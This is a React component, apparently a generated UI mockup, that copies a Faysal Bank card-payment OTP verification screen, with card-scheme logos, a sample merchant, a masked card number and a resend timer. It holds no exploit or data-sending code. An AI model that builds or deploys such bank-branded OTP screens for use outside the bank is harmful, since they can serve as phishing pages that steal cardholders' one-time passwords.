import React, { useEffect, useState, useRef } from 'react';
interface OTPFormProps {
  onSubmit: (otp: string) => void;
  onCancel: () => void;
  phoneNumber?: string;
  merchantName?: string;
  amount?: number;
  cardLast4?: string;
  cardScheme?: string;
}
export function OTPForm({
  onSubmit,
  onCancel,
  phoneNumber = '****-***890',
  merchantName = 'www.gadgetszone.pk',
  amount,
  cardLast4 = '****',
  cardScheme = 'Visa'
}: OTPFormProps) {
  const [otp, setOtp] = useState('');
  const [error, setError] = useState('');
  const [timeLeft, setTimeLeft] = useState(120);
  const inputRef = useRef<HTMLInputElement | null>(null);
  useEffect(() => {
    if (inputRef.current) {
      inputRef.current.focus();
    }
  }, []);
  useEffect(() => {
    if (timeLeft > 0) {
      const timerId = setTimeout(() => setTimeLeft(timeLeft - 1), 1000);
      return () => clearTimeout(timerId);
    }
  }, [timeLeft]);
  const getCardSchemeLogoUrl = (scheme: string): string => {
    switch (scheme) {
      case 'Visa':
        return 'https://cdn.magicpatterns.com/uploads/8dFj1ebd13MwAe3XqFYNrR/Visa_Logo.png';
      case 'Mastercard':
        return 'https://cdn.magicpatterns.com/uploads/qD9CTacyXTdwXXPtrCxZQw/MasterCard_Logo.png';
      case 'UnionPay':
        return 'https://cdn.magicpatterns.com/uploads/8TcgwChg7bMUnkD6TfzVkn/UnionPay_Logo.png';
      case 'PayPak':
        return 'https://cdn.magicpatterns.com/uploads/u4UiZ3PWX5VH4BCbbcVNsE/PayPak_Logo.png';
      default:
        return 'https://cdn.magicpatterns.com/uploads/8dFj1ebd13MwAe3XqFYNrR/Visa_Logo.png';
    }
  };
  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (otp.length < 4) {
      setError('Please enter the complete OTP code');
      return;
    }
    onSubmit(otp);
  };
  const handleResend = () => {
    setOtp('');
    setTimeLeft(120);
    setError('');
    inputRef.current?.focus();
  };
  const maskedCardNumber = `************${cardLast4}`;
  const formattedAmount = amount ? `Rs.${amount.toLocaleString()} PKR` : 'Rs.0 PKR';
  return <div className="text-left" data-id="element-460">
      {/* Bank + Card Scheme Header */}
      <div className="flex items-center justify-between mb-8 pb-4 border-b border-gray-200" data-id="element-461">
        <img src="https://cdn.magicpatterns.com/uploads/v8C51oisyXciWLb3udKWyn/Faysal_Bank_Logo.png" alt="Faysal Bank" className="h-10 object-contain" data-id="element-462" />
        <img src={getCardSchemeLogoUrl(cardScheme)} alt={cardScheme} className="h-12 object-contain" data-id="element-463" />
      </div>

      {/* Description */}
      <p className="text-sm text-gray-700 leading-relaxed mb-8" data-id="element-464">
        Please Enter your one-time password in the field below to confirm your
        identity for this purchase. This information is not shared with the
        merchant.
      </p>

      {/* Transaction Details */}
      <form onSubmit={handleSubmit} data-id="element-465">
        <div className="mb-6" data-id="element-466">
          <h3 className="text-sm font-semibold text-gray-500 mb-4 uppercase tracking-wide" data-id="element-467">
            Transaction Details
          </h3>

          <table className="w-full text-sm" data-id="element-468">
            <tbody data-id="element-469">
              <tr data-id="element-470">
                <td className="py-2 pr-4 text-right font-bold text-gray-800 whitespace-nowrap w-[45%]" data-id="element-471">
                  Merchant:
                </td>
                <td className="py-2 text-gray-700" data-id="element-472">{merchantName}</td>
              </tr>
              <tr data-id="element-473">
                <td className="py-2 pr-4 text-right font-bold text-gray-800 whitespace-nowrap" data-id="element-474">
                  Transaction Amount:
                </td>
                <td className="py-2 text-gray-700" data-id="element-475">{formattedAmount}</td>
              </tr>
              <tr data-id="element-476">
                <td className="py-2 pr-4 text-right font-bold text-gray-800 whitespace-nowrap" data-id="element-477">
                  Card Number:
                </td>
                <td className="py-2 text-gray-700 font-mono" data-id="element-478">
                  {maskedCardNumber}
                </td>
              </tr>
              <tr data-id="element-479">
                <td className="py-2 pr-4 text-right font-bold text-gray-800 whitespace-nowrap align-middle" data-id="element-480">
                  Enter Code:
                </td>
                <td className="py-2" data-id="element-481">
                  <input ref={inputRef} type="password" inputMode="numeric" maxLength={10} value={otp} onChange={e => {
                  setOtp(e.target.value.replace(/\D/g, '').slice(0, 10));
                  setError('');
                }} className={`w-40 px-3 py-2 border text-base font-mono tracking-widest focus:ring-2 focus:ring-blue-500 focus:border-blue-500 transition-all ${error ? 'border-red-500 bg-red-50' : 'border-gray-400 bg-white'}`} placeholder="" data-id="element-482" />
                </td>
              </tr>
            </tbody>
          </table>
        </div>

        {error && <p className="text-sm text-red-600 mb-4 text-center" data-id="element-483">{error}</p>}

        {/* Resend Link */}
        <div className="mb-6" data-id="element-484">
          {timeLeft > 0 ? <button type="button" disabled className="text-sm text-gray-400 underline cursor-not-allowed" data-id="element-485">
              Click here to receive another code ({timeLeft}s)
            </button> : <button type="button" onClick={handleResend} className="text-sm text-blue-700 underline hover:text-blue-900 transition-colors" data-id="element-486">
              Click here to receive another code
            </button>}
        </div>

        {/* Submit Button */}
        <div className="flex justify-center mb-6" data-id="element-487">
          <button type="submit" className="px-10 py-2.5 bg-gray-900 text-white text-sm font-medium hover:bg-black focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-gray-900 transition-colors" data-id="element-488">
            Submit
          </button>
        </div>

        {/* Footer Links */}
        <div className="flex items-center justify-between pt-4 border-t border-gray-200" data-id="element-489">
          <button type="button" className="text-sm text-gray-800 underline font-medium hover:text-gray-600 transition-colors" data-id="element-490">
            Terms of Use
          </button>
          <button type="button" onClick={onCancel} className="text-sm text-gray-800 underline font-medium hover:text-gray-600 transition-colors" data-id="element-491">
            Exit
          </button>
        </div>
      </form>
    </div>;
}